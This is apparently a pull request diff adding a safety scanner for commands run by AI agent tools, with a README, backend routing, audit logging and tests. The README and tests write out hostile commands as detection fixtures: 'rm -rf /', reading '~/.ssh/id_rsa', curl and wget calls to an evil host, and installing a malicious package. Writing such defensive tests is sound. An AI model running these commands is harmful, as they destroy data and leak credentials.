### PR TITLE
feat: add Tool Execution Safety Guard

### DIFF
--- a/.typos.toml
+++ b/.typos.toml
@@ -39,3 +39,7 @@ rin = "rin"
 dify = "dify"
 countr = "countr"
 daa = "daa"
+# require_human_reveiw is deliberately misspelled in
+# policy_strict_yaml_test.go to verify that unknown YAML fields are
+# rejected by KnownFields(true). Do not "fix" that spelling.
+reveiw = "reveiw"

--- a/tool/codeexec/codeexec.go
+++ b/tool/codeexec/codeexec.go
@@ -17,6 +17,7 @@ import (
 
 	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
 )
 
 // Option configures the code execution tool.
@@ -77,6 +78,14 @@ func NewTool(exec codeexecutor.CodeExecutor, opts ...Option) tool.CallableTool {
 type executeCodeTool struct {
 	executor codeexecutor.CodeExecutor
 	cfg      config
+}
+
+// SafetyBackend declares that this tool executes code in the codeexec
+// backend, so the safety scanner selects the codeexec rule set without
+// relying on tool-name substring matching.  The method implements
+// safety.BackendProvider.
+func (t *executeCodeTool) SafetyBackend() safety.Backend {
+	return safety.BackendCodeExec
 }
 
 // Declaration returns the tool's declaration.
@@ -230,3 +239,5 @@ func (t *executeCodeTool) Call(ctx context.Context, args []byte) (any, error) {
 func (t *executeCodeTool) isSupportedLanguage(language string) bool {
 	return slices.Contains(t.cfg.languages, language)
 }
+
+var _ safety.BackendProvider = (*executeCodeTool)(nil)

--- a/tool/codeexec/codeexec_safety_backend_test.go
+++ b/tool/codeexec/codeexec_safety_backend_test.go
@@ -1,0 +1,85 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package codeexec
+
+import (
+	"context"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+// TestExecuteCodeTool_DeclaresCodeExecBackend asserts that the code
+// execution tool declares its safety backend as codeexec via the
+// safety.BackendProvider interface, and that a permission check driven
+// through the real tool records backend=codeexec in the audit log.
+//
+// Without the interface, inferBackend falls back to a name heuristic:
+// the default tool name "execute_code" contains "execute", which the
+// heuristic maps to BackendCodeExec by coincidence. Declaring the
+// backend explicitly removes the dependency on that substring match,
+// which is the same fragile path that misroutes exec_command.
+func TestExecuteCodeTool_DeclaresCodeExecBackend(t *testing.T) {
+	tl := NewTool(&mockCodeExecutor{}).(*executeCodeTool)
+	require.NotNil(t, tl)
+
+	// Compile-time and runtime interface check.
+	var _ safety.BackendProvider = tl
+	require.Equal(t, safety.BackendCodeExec, tl.SafetyBackend())
+
+	// End-to-end: the backend recorded in the audit log must be
+	// codeexec, sourced from the declared backend rather than from name
+	// matching.
+	tmpDir := t.TempDir()
+	auditPath := filepath.Join(tmpDir, "audit.jsonl")
+	scanner, err := safety.NewScanner(safety.DefaultPolicy())
+	require.NoError(t, err)
+	auditLogger, err := safety.NewAuditLogger(
+		auditPath, safety.DefaultPolicy().SensitivePatterns,
+	)
+	require.NoError(t, err)
+	defer auditLogger.Close() //nolint:errcheck
+
+	policy := safety.NewPermissionPolicyFromScanner(scanner, auditLogger)
+
+	// Use the real code_blocks argument shape (the tool's declared
+	// schema requires code_blocks; a top-level code field is not part
+	// of the contract).  The block content is irrelevant to this test,
+	// which only asserts the recorded backend.
+	args, err := json.Marshal(map[string]any{
+		"code_blocks": []map[string]any{
+			{"language": "python", "code": "print('hi')"},
+		},
+	})
+	require.NoError(t, err)
+
+	req := &tool.PermissionRequest{
+		Tool:      tl,
+		ToolName:  "execute_code",
+		Arguments: args,
+	}
+	_, err = policy.CheckToolPermission(context.Background(), req)
+	require.NoError(t, err)
+
+	data, err := os.ReadFile(auditPath)
+	require.NoError(t, err)
+
+	var event safety.AuditEvent
+	require.NoError(t, json.Unmarshal(data, &event), "audit log: %s", data)
+	require.Equal(t, string(safety.BackendCodeExec), event.Backend,
+		"execute_code must route to the codeexec backend, not %q",
+		event.Backend)
+}

--- a/tool/hostexec/hostexec.go
+++ b/tool/hostexec/hostexec.go
@@ -22,6 +22,7 @@ import (
 	"time"
 
 	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
 )
 
 const (
@@ -256,6 +257,14 @@ func (t *execCommandTool) Declaration() *tool.Declaration {
 			},
 		},
 	}
+}
+
+// SafetyBackend declares that this tool executes commands on the host
+// backend, so the safety scanner selects the hostexec rule set without
+// relying on tool-name substring matching.  The method implements
+// safety.BackendProvider.
+func (t *execCommandTool) SafetyBackend() safety.Backend {
+	return safety.BackendHostExec
 }
 
 type execInput struct {
@@ -639,3 +648,4 @@ var _ tool.ToolSet = (*toolSet)(nil)
 var _ tool.CallableTool = (*execCommandTool)(nil)
 var _ tool.CallableTool = (*writeStdinTool)(nil)
 var _ tool.CallableTool = (*killSessionTool)(nil)
+var _ safety.BackendProvider = (*execCommandTool)(nil)

--- a/tool/hostexec/hostexec_safety_backend_test.go
+++ b/tool/hostexec/hostexec_safety_backend_test.go
@@ -1,0 +1,90 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package hostexec
+
+import (
+	"context"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+// TestExecCommandTool_DeclaresHostExecBackend is the regression test for
+// the routing bug where the model-visible exec_command tool fell through
+// to the WorkspaceExec rule set because its name lacks the substring
+// "host".  The fix is for the tool to implement safety.BackendProvider
+// and return safety.BackendHostExec; inferBackend then trusts the
+// declared backend instead of guessing from the name.
+//
+// This test drives the real execCommandTool through the safety
+// PermissionPolicy and asserts that the resulting audit event records
+// backend=hostexec (not workspaceexec).  It fails on the current
+// implementation because execCommandTool does not yet implement
+// BackendProvider, so inferBackend falls back to the name heuristic and
+// "exec_command" matches neither "host" nor "code", defaulting to
+// workspaceexec.
+func TestExecCommandTool_DeclaresHostExecBackend(t *testing.T) {
+	set, err := NewToolSet()
+	require.NoError(t, err)
+	defer set.Close()
+
+	execTool, _, _, _ := toolSetTools(t, set)
+	// We need the concrete *execCommandTool as the PermissionRequest.Tool
+	// value so safety.BackendProvider can be detected on it.
+	rawTool, ok := execTool.(*execCommandTool)
+	require.True(t, ok, "exec tool must be *execCommandTool")
+
+	// Sanity: the tool must implement safety.BackendProvider at all.
+	var _ safety.BackendProvider = rawTool
+	require.Equal(t, safety.BackendHostExec, rawTool.SafetyBackend())
+
+	// End-to-end: drive the policy and observe the backend via the
+	// audit log, the externally observable seam for the chosen backend.
+	tmpDir := t.TempDir()
+	auditPath := filepath.Join(tmpDir, "audit.jsonl")
+	scanner, err := safety.NewScanner(safety.DefaultPolicy())
+	require.NoError(t, err)
+	auditLogger, err := safety.NewAuditLogger(
+		auditPath, safety.DefaultPolicy().SensitivePatterns,
+	)
+	require.NoError(t, err)
+	defer auditLogger.Close() //nolint:errcheck
+
+	policy := safety.NewPermissionPolicyFromScanner(scanner, auditLogger)
+
+	args, err := json.Marshal(map[string]any{"command": "ls -la"})
+	require.NoError(t, err)
+
+	req := &tool.PermissionRequest{
+		Tool:      rawTool,
+		ToolName:  "exec_command",
+		Arguments: args,
+	}
+	dec, err := policy.CheckToolPermission(context.Background(), req)
+	require.NoError(t, err)
+	// hostexec has RequireHumanReview=true by default, so a safe command
+	// yields ask (or at worst deny).  The action itself is not what we
+	// are asserting here; we assert the backend recorded in the audit.
+	_ = dec
+
+	data, err := os.ReadFile(auditPath)
+	require.NoError(t, err)
+
+	var event safety.AuditEvent
+	require.NoError(t, json.Unmarshal(data, &event), "audit log: %s", data)
+	require.Equal(t, string(safety.BackendHostExec), event.Backend,
+		"exec_command must route to the hostexec backend, not %q", event.Backend)
+}

--- a/tool/safety/README.md
+++ b/tool/safety/README.md
@@ -143,8 +143,10 @@ Every scan produces:
 2. **Audit log** (`tool_safety_audit.jsonl`) — one JSON line per scan,
    with redacted commands and timing information.
 3. **OpenTelemetry span attributes** — `tool.safety.decision`,
-   `tool.safety.risk_level`, `tool.safety.rule_id`,
-   `tool.safety.backend`, `tool.safety.blocked`.  (The `decision` and
+   `tool.safety.risk_level`, `tool.safety.risk_count`,
+   `tool.safety.backend`, `tool.safety.blocked`, and per-risk indexed
+   attributes `tool.safety.risk.N.rule_id` and
+   `tool.safety.risk.N.level`.  (The `decision` and
    `blocked` attribute names are kept stable as wire-level telemetry
    schema; the value of `blocked` is derived from
    `verdict == "deny"`.)

--- a/tool/safety/README.md
+++ b/tool/safety/README.md
@@ -1,0 +1,182 @@
+# Tool Execution Safety Guard
+
+The `tool/safety` package provides a pre-execution safety scanner for
+tRPC-Agent-Go's tool execution layer.  It scans shell commands and
+source code before execution, producing an `allow` / `deny` / `ask`
+verdict based on a configurable policy.
+
+## Why this exists
+
+tRPC-Agent-Go's Tool, MCP Tool, Skill, and CodeExecutor capabilities
+let agents execute scripts, call external commands, read/write files,
+and access the network.  These capabilities are essential for
+automation but introduce security risks:
+
+- Destructive commands (`rm -rf /`)
+- Credential theft (`cat ~/.ssh/id_rsa`)
+- Data exfiltration (`curl https://evil.com`)
+- Shell-wrapper bypass (`sh -c '...'`)
+- Privilege escalation (`sudo ...`)
+- Dependency installation (`pip install malicious-pkg`)
+- Resource abuse (infinite loops, `/dev/zero`)
+- Secret leakage (API keys in commands)
+
+The Safety Guard addresses these risks by scanning commands **before**
+execution and blocking or flagging high-risk operations.
+
+## Relationship to existing security layers
+
+The Safety Guard is **not a replacement** for sandbox isolation.  It is
+an additional defense-in-depth layer that complements the existing
+security mechanisms:
+
+| Layer | Package | Responsibility |
+|-------|---------|---------------|
+| Structural validation | `internal/shellsafe` | Rejects shell features ($(), backticks, redirections) |
+| Environment scrubbing | `internal/envscrub` | Strips dangerous env vars (PATH, LD_PRELOAD, ...) |
+| OS-level isolation | `codeexecutor/sandbox` | Filesystem and network namespace isolation |
+| **Semantic risk scan** | **`tool/safety`** | **Detects dangerous commands, paths, egress, secrets** |
+| Permission policy | `tool.PermissionPolicy` | Framework hook for allow/deny/ask decisions |
+
+The Safety Guard plugs into the `PermissionPolicy` extension point,
+running after the tool's own `PermissionChecker` but before execution.
+
+## Architecture
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                   PermissionPolicy                      │
+│  (tool/safety/permission.go — adapts Scanner to         │
+│   tool.PermissionPolicy interface)                      │
+└───────────────┬─────────────────────────────────────────┘
+                │
+                ▼
+┌─────────────────────────────────────────────────────────┐
+│                      Scanner                            │
+│  (tool/safety/scanner.go — orchestrates the scan)       │
+│                                                         │
+│  1. shellsafe.Parse (structural validation)             │
+│  2. shellsafe.Policy.Check (allow/deny list)            │
+│  3. Run all Rules (semantic risk detection)             │
+│  4. Compute verdict (deny > ask > allow)                │
+└───────────────┬─────────────────────────────────────────┘
+                │
+        ┌───────┼───────┬───────┬───────┬───────┬───────┐
+        ▼       ▼       ▼       ▼       ▼       ▼       ▼
+     Rule 1  Rule 2  Rule 3  Rule 4  Rule 5  Rule 6  Rule 7
+     Danger  Network Shell   HostDep  DepIns  Resrc   Sensitive
+     Cmd     Egress  Bypass  Exec     tall    Abuse   Leak
+                                                      + CodeExec
+```
+
+## Risk categories
+
+| # | Rule ID | Risk | Default Level |
+|---|---------|------|---------------|
+| 1 | `dangerous_command` | `rm -rf`, forbidden paths, `/dev/zero` | critical/high |
+| 2 | `network_egress` | Non-whitelisted network access | critical/high |
+| 3 | `shell_bypass` | `sh -c`, `bash -c` wrappers | critical |
+| 4 | `hostexec_risk` | hostexec review, background, privilege | medium/high |
+| 5 | `dependency_install` | `pip install`, `npm install`, etc. | medium/high |
+| 6 | `resource_abuse` | Infinite loops, `/dev/zero` | high |
+| 7 | `sensitive_leak` | API keys, tokens, credentials in commands | high/critical |
+| 8 | `code_exec_danger` | `os.system()`, `subprocess` in code | critical |
+
+## Usage
+
+### Basic usage
+
+```go
+import (
+    "trpc.group/trpc-go/trpc-agent-go/tool/safety"
+    "trpc.group/trpc-go/trpc-agent-go/agent"
+)
+
+// Create a permission policy from a config file.
+policy, err := safety.NewPermissionPolicy(
+    "tool_safety_policy.yaml",
+    "tool_safety_audit.jsonl",
+)
+if err != nil {
+    log.Fatal(err)
+}
+
+// Apply the policy as a per-invocation run option.
+// agent.WithToolPermissionPolicy is a RunOption, not a New option.
+runner.Run(ctx, role, sessionID, model.NewUserMessage("your message"),
+    agent.WithToolPermissionPolicy(policy),
+)
+```
+
+### Programmatic usage
+
+```go
+scanner, _ := safety.NewScanner(safety.DefaultPolicy())
+report, _ := scanner.ScanCommand(ctx, &safety.ScanRequest{
+    ToolName: "workspace_exec",
+    Command:  "rm -rf /",
+    Backend:  safety.BackendWorkspaceExec,
+})
+fmt.Println(report.Verdict) // "deny"
+// report.Blocked has been removed; compare report.Verdict == safety.VerdictDeny
+```
+
+## Configuration
+
+See `tool_safety_policy.yaml` for the full configuration reference.
+The policy file can be modified without code changes to adjust:
+
+- Allowed and denied commands
+- Forbidden paths
+- Network whitelist
+- Resource limits
+- Dependency manager policy
+- Sensitive information patterns
+- Per-backend overrides
+
+## Audit and observability
+
+Every scan produces:
+
+1. **Structured report** (`ScanReport`) — contains the verdict, risk
+   level, rule IDs, evidence, and recommendations.
+2. **Audit log** (`tool_safety_audit.jsonl`) — one JSON line per scan,
+   with redacted commands and timing information.
+3. **OpenTelemetry span attributes** — `tool.safety.decision`,
+   `tool.safety.risk_level`, `tool.safety.rule_id`,
+   `tool.safety.backend`, `tool.safety.blocked`.  (The `decision` and
+   `blocked` attribute names are kept stable as wire-level telemetry
+   schema; the value of `blocked` is derived from
+   `verdict == "deny"`.)
+
+## Verdict logic
+
+The scanner computes the final verdict as follows:
+
+1. If any rule returns `ShouldBlock: true` → **deny**
+2. If any rule returns `RiskHigh` or `RiskCritical` → **deny**
+3. If any rule returns `RiskMedium` → **ask**
+4. Otherwise → fall back to the policy's `default_verdict` (or
+   **allow** when unset)
+
+## Backend-specific behavior
+
+- **workspaceexec**: Applies shellsafe structural validation + all
+  semantic rules. Background processes are configurable.
+- **hostexec**: Applies shellsafe + all semantic rules. Defaults to
+  `RequireHumanReview: true` (all commands need approval).
+- **codeexec**: Skips shellsafe (code is not shell). Uses the
+  `code_exec_danger` rule to detect dangerous Python/bash patterns.
+
+## Limitations
+
+The Safety Guard is a **static, pre-execution** scanner.  It cannot:
+
+- Detect risks that only manifest at runtime (e.g., a script that
+  downloads and executes a payload in two steps).
+- Replace sandbox isolation — a command that passes the scan can
+  still cause damage if the sandbox is misconfigured.
+- Analyze obfuscated code that hides its intent through indirection.
+
+For production deployments, combine the Safety Guard with sandbox
+isolation, network policies, and runtime monitoring.

--- a/tool/safety/audit.go
+++ b/tool/safety/audit.go
@@ -1,0 +1,120 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"sync"
+	"time"
+)
+
+// AuditEvent is one line in the audit log, written as JSON.
+type AuditEvent struct {
+	Timestamp    time.Time `json:"timestamp"`
+	ToolName     string    `json:"tool_name"`
+	Backend      string    `json:"backend"`
+	Command      string    `json:"command"`
+	Verdict      string    `json:"verdict"`
+	RiskLevel    string    `json:"risk_level"`
+	RiskCount    int       `json:"risk_count"`
+	RuleIDs      []string  `json:"rule_ids"`
+	DurationMs   int64     `json:"duration_ms"`
+	Redacted     bool      `json:"redacted"`
+	SessionID    string    `json:"session_id,omitempty"`
+	InvocationID string    `json:"invocation_id,omitempty"`
+}
+
+// AuditLogger writes AuditEvents as JSON Lines to a file.
+type AuditLogger struct {
+	mu       sync.Mutex
+	file     *os.File
+	encoder  *json.Encoder
+	redactor *Redactor
+}
+
+// NewAuditLogger opens path for appending (creating it if needed)
+// and returns a ready-to-use AuditLogger.  The file is opened with
+// 0600 permissions to protect potentially sensitive audit data.
+func NewAuditLogger(path string, patterns []string) (*AuditLogger, error) {
+	file, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
+	if err != nil {
+		return nil, fmt.Errorf("safety: open audit log: %w", err)
+	}
+	return &AuditLogger{
+		file:     file,
+		encoder:  json.NewEncoder(file),
+		redactor: NewRedactor(patterns),
+	}, nil
+}
+
+// Log writes a single AuditEvent derived from report and duration.
+// The command is redacted before writing.  A non-nil error from Log
+// does not prevent the tool from executing — callers should log the
+// error but continue.
+func (l *AuditLogger) Log(ctx context.Context, report *ScanReport, duration time.Duration) error {
+	l.mu.Lock()
+	defer l.mu.Unlock()
+
+	redacted := l.redactor.Redact(report.Command)
+	wasRedacted := redacted != report.Command
+
+	ruleIDs := make([]string, len(report.Risks))
+	for i, risk := range report.Risks {
+		ruleIDs[i] = risk.RuleID
+	}
+
+	sessionID, _ := ctx.Value(sessionIDKey{}).(string)
+	invocationID, _ := ctx.Value(invocationIDKey{}).(string)
+
+	event := AuditEvent{
+		Timestamp:    time.Now(),
+		ToolName:     report.ToolName,
+		Backend:      string(report.Backend),
+		Command:      redacted,
+		Verdict:      string(report.Verdict),
+		RiskLevel:    string(report.RiskLevel),
+		RiskCount:    len(report.Risks),
+		RuleIDs:      ruleIDs,
+		DurationMs:   duration.Milliseconds(),
+		Redacted:     wasRedacted,
+		SessionID:    sessionID,
+		InvocationID: invocationID,
+	}
+
+	if err := l.encoder.Encode(event); err != nil {
+		return fmt.Errorf("safety: encode audit event: %w", err)
+	}
+	return nil
+}
+
+// Close flushes and closes the underlying file.
+func (l *AuditLogger) Close() error {
+	l.mu.Lock()
+	defer l.mu.Unlock()
+	return l.file.Close()
+}
+
+// sessionIDKey and invocationIDKey are context value key types used
+// by AuditLogger.Log to extract session and invocation identifiers.
+type sessionIDKey struct{}
+type invocationIDKey struct{}
+
+// WithSessionID returns a new context that carries sessionID so
+// AuditLogger.Log can include it in audit events.
+func WithSessionID(ctx context.Context, sessionID string) context.Context {
+	return context.WithValue(ctx, sessionIDKey{}, sessionID)
+}
+
+// WithInvocationID returns a new context that carries invocationID.
+func WithInvocationID(ctx context.Context, invocationID string) context.Context {
+	return context.WithValue(ctx, invocationIDKey{}, invocationID)
+}

--- a/tool/safety/audit.go
+++ b/tool/safety/audit.go
@@ -44,15 +44,29 @@ type AuditLogger struct {
 // NewAuditLogger opens path for appending (creating it if needed)
 // and returns a ready-to-use AuditLogger.  The file is opened with
 // 0600 permissions to protect potentially sensitive audit data.
+//
+// If any of the redaction patterns fail to compile, NewAuditLogger
+// returns a non-nil error and a nil *AuditLogger rather than
+// succeeding with a redactor that would persist secrets in clear
+// text.  The opened file is closed on this error path.
 func NewAuditLogger(path string, patterns []string) (*AuditLogger, error) {
 	file, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
 	if err != nil {
 		return nil, fmt.Errorf("safety: open audit log: %w", err)
 	}
+	redactor, err := NewRedactor(patterns)
+	if err != nil {
+		// A redactor that cannot honor the configured secret patterns
+		// must not be allowed to stand, otherwise sensitive commands
+		// would be persisted in clear text.  Close the file we just
+		// opened and surface the error.
+		_ = file.Close()
+		return nil, err
+	}
 	return &AuditLogger{
 		file:     file,
 		encoder:  json.NewEncoder(file),
-		redactor: NewRedactor(patterns),
+		redactor: redactor,
 	}, nil
 }
 

--- a/tool/safety/backend_provider_test.go
+++ b/tool/safety/backend_provider_test.go
@@ -1,0 +1,102 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// fakeBackendTool is a minimal tool whose only purpose is to declare a
+// safety backend via BackendProvider.  It deliberately advertises a
+// ToolName that the legacy name heuristic would map to a *different*
+// backend, so a test can prove that inferBackend honors the declared
+// backend and never consults the name.
+type fakeBackendTool struct {
+	declared Backend
+	name     string
+}
+
+func (f *fakeBackendTool) Declaration() *tool.Declaration {
+	return &tool.Declaration{Name: f.name}
+}
+
+// SafetyBackend implements BackendProvider.
+func (f *fakeBackendTool) SafetyBackend() Backend { return f.declared }
+
+// TestInferBackend_HonorsDeclaredBackend_IgnoresName proves that when
+// the tool implements BackendProvider, inferBackend returns the
+// declared backend and does not fall through to the name-based
+// heuristic.  This is the contract that lets the three exec tools
+// (hostexec, workspaceexec, codeexec) declare their backends without
+// depending on name substring matching, and is what makes the
+// heuristic unreachable for them.
+//
+// The fake tool's ToolName "execute_code" would, under the legacy
+// heuristic, route to BackendCodeExec (because it contains "execute").
+// The tool instead declares BackendHostExec; if inferBackend honors
+// the interface, the result must be BackendHostExec.  If the name
+// branch were reachable here, the test would fail.
+func TestInferBackend_HonorsDeclaredBackend_IgnoresName(t *testing.T) {
+	// "execute_code" → heuristic maps to CodeExec; declared HostExec.
+	req := &tool.PermissionRequest{
+		Tool:     &fakeBackendTool{declared: BackendHostExec, name: "execute_code"},
+		ToolName: "execute_code",
+	}
+	if got := inferBackend(req); got != BackendHostExec {
+		t.Errorf("inferBackend: got %q want %q (declared backend must win over name)",
+			got, BackendHostExec)
+	}
+}
+
+// TestInferBackend_FallbackUsedOnlyWhenBackendNotDeclared confirms the
+// name-based heuristic remains available as a last resort for tools
+// that do not implement BackendProvider.  This preserves backward
+// compatibility for ad-hoc tools while keeping the heuristic out of
+// the path for tools that declare their backend.
+func TestInferBackend_FallbackUsedOnlyWhenBackendNotDeclared(t *testing.T) {
+	// A plain tool with no SafetyBackend method: the heuristic applies.
+	plain := &fakeNoBackendTool{name: "host_runner"}
+	req := &tool.PermissionRequest{
+		Tool:     plain,
+		ToolName: "host_runner",
+	}
+	// "host_runner" contains "host" → BackendHostExec via heuristic.
+	if got := inferBackend(req); got != BackendHostExec {
+		t.Errorf("inferBackend fallback: got %q want %q", got, BackendHostExec)
+	}
+}
+
+// TestInferBackend_FallbackNonExecNameReturnsNone proves that a tool name
+// carrying no execution signal (no "host", "code", or "execute" substring)
+// resolves to BackendNone, marking it as a non-execution tool.  This is
+// the distinction that lets CheckToolPermission short-circuit file, search,
+// and MCP tools instead of intercepting them for a missing "command".
+func TestInferBackend_FallbackNonExecNameReturnsNone(t *testing.T) {
+	for _, name := range []string{"file_read", "search", "mcp_weather", "list_dir"} {
+		req := &tool.PermissionRequest{
+			Tool:     &fakeNoBackendTool{name: name},
+			ToolName: name,
+		}
+		if got := inferBackend(req); got != BackendNone {
+			t.Errorf("inferBackend(%q): got %q want %q (non-exec name must resolve to none)",
+				name, got, BackendNone)
+		}
+	}
+}
+
+// fakeNoBackendTool implements tool.Tool but NOT BackendProvider, so
+// the name heuristic is the only signal available.
+type fakeNoBackendTool struct{ name string }
+
+func (f *fakeNoBackendTool) Declaration() *tool.Declaration {
+	return &tool.Declaration{Name: f.name}
+}

--- a/tool/safety/dependency_tokenize_test.go
+++ b/tool/safety/dependency_tokenize_test.go
@@ -1,0 +1,92 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import "testing"
+
+// ----------------------------------------------------------------------
+// Tokenized dependency detection (issue 10).
+//
+// dependencyRule must match on the parsed executable + subcommand rather
+// than an exact single-space substring like "pip install ".  Shell-
+// equivalent spellings such as "pip  install" (double space) and
+// "pip\tinstall" (tab) tokenize to the same argv and must trigger the
+// rule, so an allowed manager is still checked against denied_packages
+// and blocked when it installs a denied package.
+// ----------------------------------------------------------------------
+
+// newTokenizeScanner builds a scanner whose policy allows pip and treats
+// it as an allowed manager, with the given denied packages.
+func newTokenizeScanner(t *testing.T, denied []string) *Scanner {
+	t.Helper()
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = denied
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return s
+}
+
+func TestDependency_TokenizedInstall_DoubleSpace(t *testing.T) {
+	s := newTokenizeScanner(t, nil)
+	report := scan(t, s, "pip  install requests", BackendWorkspaceExec)
+	assertHasRule(t, report, "dependency_install")
+}
+
+func TestDependency_TokenizedInstall_Tab(t *testing.T) {
+	s := newTokenizeScanner(t, nil)
+	report := scan(t, s, "pip\tinstall requests", BackendWorkspaceExec)
+	assertHasRule(t, report, "dependency_install")
+}
+
+func TestDependency_TokenizedDeniedPackage_DoubleSpace(t *testing.T) {
+	s := newTokenizeScanner(t, []string{"malicious-pkg"})
+	report := scan(t, s, "pip  install malicious-pkg", BackendWorkspaceExec)
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied package with double-space install must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDependency_TokenizedDeniedPackage_Tab(t *testing.T) {
+	s := newTokenizeScanner(t, []string{"malicious-pkg"})
+	report := scan(t, s, "pip\tinstall malicious-pkg", BackendWorkspaceExec)
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied package with tab-separated install must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDependency_NonDependencyCommand_NotFlagged(t *testing.T) {
+	s := newTokenizeScanner(t, nil)
+	// "pip" appears textually but is not the executable, so this is not
+	// a dependency install.  The rule must not fire on over-broad
+	// substring matching.
+	report := scan(t, s, "echo pip install requests", BackendWorkspaceExec)
+	for _, r := range report.Risks {
+		if r.RuleID == "dependency_install" {
+			t.Errorf("non-dependency command must not be flagged: %+v", r)
+		}
+	}
+}
+
+func TestDependency_NonInstallSubcommand_NotFlagged(t *testing.T) {
+	s := newTokenizeScanner(t, nil)
+	// pip is the executable but the subcommand is not an install, so the
+	// dependency rule must not fire.
+	report := scan(t, s, "pip list", BackendWorkspaceExec)
+	for _, r := range report.Risks {
+		if r.RuleID == "dependency_install" {
+			t.Errorf("pip with a non-install subcommand must not be flagged: %+v", r)
+		}
+	}
+}

--- a/tool/safety/network_egress_hosts_test.go
+++ b/tool/safety/network_egress_hosts_test.go
@@ -1,0 +1,122 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"testing"
+)
+
+// assertNoRule fails the test if the report contains a risk with the
+// given rule ID.
+func assertNoRule(t *testing.T, report *ScanReport, ruleID string) {
+	t.Helper()
+	for _, r := range report.Risks {
+		if r.RuleID == ruleID {
+			t.Errorf("expected no rule %q in risks, got %v", ruleID, report.Risks)
+			return
+		}
+	}
+}
+
+// scannerWithPolicy returns a scanner built from the test default policy
+// (DefaultVerdict=Allow) after applying mutate.  Using a fresh policy per
+// test keeps the default whitelist intact while individual tests extend it.
+func scannerWithPolicy(t *testing.T, mutate func(*Policy)) *Scanner {
+	t.Helper()
+	p := defaultTestPolicy(t)
+	if mutate != nil {
+		mutate(p)
+	}
+	s, err := NewScanner(p)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return s
+}
+
+// allowCommand is a policy mutator that adds a command to the allow list.
+func allowCommand(name string) func(*Policy) {
+	return func(p *Policy) {
+		p.Commands.Allowed = append(p.Commands.Allowed, name)
+	}
+}
+
+// whitelistHost is a policy mutator that adds a host to the whitelist.
+func whitelistHost(host string) func(*Policy) {
+	return func(p *Policy) {
+		p.NetworkWhitelist = append(p.NetworkWhitelist, host)
+	}
+}
+
+func TestNetworkEgress_SchemelessGoGetNonWhitelisted(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "go get evil.example/pkg", BackendWorkspaceExec)
+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_SchemelessGoInstallNonWhitelisted(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "go install evil.example/cmd@latest", BackendWorkspaceExec)
+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_CurlSchemelessNonWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, allowCommand("curl"))
+	report := scan(t, s, "curl evil.example", BackendWorkspaceExec)
+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_CurlSchemelessWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, func(p *Policy) {
+		allowCommand("curl")(p)
+		whitelistHost("evil.example")(p)
+	})
+	report := scan(t, s, "curl evil.example", BackendWorkspaceExec)
+	assertNoRule(t, report, "network_egress")
+	assertVerdict(t, report, VerdictAllow)
+}
+
+func TestNetworkEgress_WgetSchemelessNonWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, allowCommand("wget"))
+	report := scan(t, s, "wget evil.example/archive.tar.gz", BackendWorkspaceExec)
+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_PipInstallSchemelessNonWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, allowCommand("pip"))
+	report := scan(t, s, "pip install evil.example/package", BackendWorkspaceExec)
